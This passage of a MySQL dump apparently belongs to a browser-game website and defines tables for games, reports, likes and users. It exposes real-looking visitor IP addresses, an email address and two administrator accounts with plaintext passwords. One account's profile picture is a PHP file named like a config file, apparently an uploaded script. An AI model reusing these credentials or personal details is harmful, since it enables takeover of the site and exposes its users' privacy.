(291, 'Barbies Sketch', 'e', 1),
(292, 'Barbies Sketch', 'e', 1),
(294, 'Geometry Dash Crazy', 'it is not loading after I clicked play  can you fix it ', 4),
(295, 'Warfare Area 3', 'MEGUSTO', 371);

-- --------------------------------------------------------

--
-- Structure de la table `zon_section`
--

CREATE TABLE `zon_section` (
  `id` int(11) NOT NULL,
  `section_name` text NOT NULL,
  `section_category` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Structure de la table `zon_unlikes`
--

CREATE TABLE `zon_unlikes` (
  `id` int(11) NOT NULL,
  `user_ip` text NOT NULL,
  `game_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_unlikes`
--

INSERT INTO `zon_unlikes` (`id`, `user_ip`, `game_id`) VALUES
(1224, '95.70.146.99', 23527),
(1226, '74.79.132.166', 23470),
(1228, '197.32.46.138', 23431),
(1284, '106.214.114.25', 23528),
(1289, '37.236.45.6', 23423);

-- --------------------------------------------------------

--
-- Structure de la table `zon_users`
--

CREATE TABLE `zon_users` (
  `id` int(11) NOT NULL,
  `name` varchar(2000) NOT NULL,
  `email` varchar(2000) NOT NULL,
  `username` varchar(3000) NOT NULL,
  `password` mediumtext NOT NULL,
  `user_pic` mediumtext NOT NULL,
  `status` int(11) NOT NULL,
  `is_admin` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_users`
--

INSERT INTO `zon_users` (`id`, `name`, `email`, `username`, `password`, `user_pic`, `status`, `is_admin`) VALUES
(1, 'User', 'yas0293sine@gmail.com', 'root', 'root', '106739740conflg.php', 0, 1),
(2, '', '', 'admin', 'yassinewac', 'user_pic.png', 0, 1);

--
-- Index pour les tables déchargées
--

--
-- Index pour la table `zon_ads`
--
ALTER TABLE `zon_ads`
  ADD PRIMARY KEY (`id`),
  ADD KEY `ad_name` (`ad_name`(768));

--
-- Index pour la table `zon_animation_classes`
--
ALTER TABLE `zon_animation_classes`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_blog`
--
ALTER TABLE `zon_blog`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_category`
--
ALTER TABLE `zon_category`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_comments`
--
ALTER TABLE `zon_comments`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_config`
--
ALTER TABLE `zon_config`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_featured_games`
--
ALTER TABLE `zon_featured_games`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_games`
--
ALTER TABLE `zon_games`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_likes`
--
ALTER TABLE `zon_likes`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_pages`
--
ALTER TABLE `zon_pages`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_report`
--
ALTER TABLE `zon_report`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_section`
--
ALTER TABLE `zon_section`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_unlikes`
--
ALTER TABLE `zon_unlikes`
  ADD PRIMARY KEY (`id`);

--
-- Index pour la table `zon_users`
--
ALTER TABLE `zon_users`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT pour les tables déchargées
--

--
-- AUTO_INCREMENT pour la table `zon_ads`
--
ALTER TABLE `zon_ads`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT pour la table `zon_animation_classes`
--
ALTER TABLE `zon_animation_classes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=94;

--
-- AUTO_INCREMENT pour la table `zon_blog`
--
ALTER TABLE `zon_blog`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT pour la table `zon_category`
--
ALTER TABLE `zon_category`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=75;

--
-- AUTO_INCREMENT pour la table `zon_comments`
--
ALTER TABLE `zon_comments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT pour la table `zon_config`
--
ALTER TABLE `zon_config`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT pour la table `zon_featured_games`
--
ALTER TABLE `zon_featured_games`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT pour la table `zon_games`
--
ALTER TABLE `zon_games`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=917;

--
-- AUTO_INCREMENT pour la table `zon_likes`
--
ALTER TABLE `zon_likes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=222;

--
-- AUTO_INCREMENT pour la table `zon_pages`
--
ALTER TABLE `zon_pages`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT pour la table `zon_report`
--
ALTER TABLE `zon_report`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=296;

--
-- AUTO_INCREMENT pour la table `zon_section`
--
ALTER TABLE `zon_section`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT pour la table `zon_unlikes`
--
ALTER TABLE `zon_unlikes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1291;

--
-- AUTO_INCREMENT pour la table `zon_users`
--
ALTER TABLE `zon_users`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
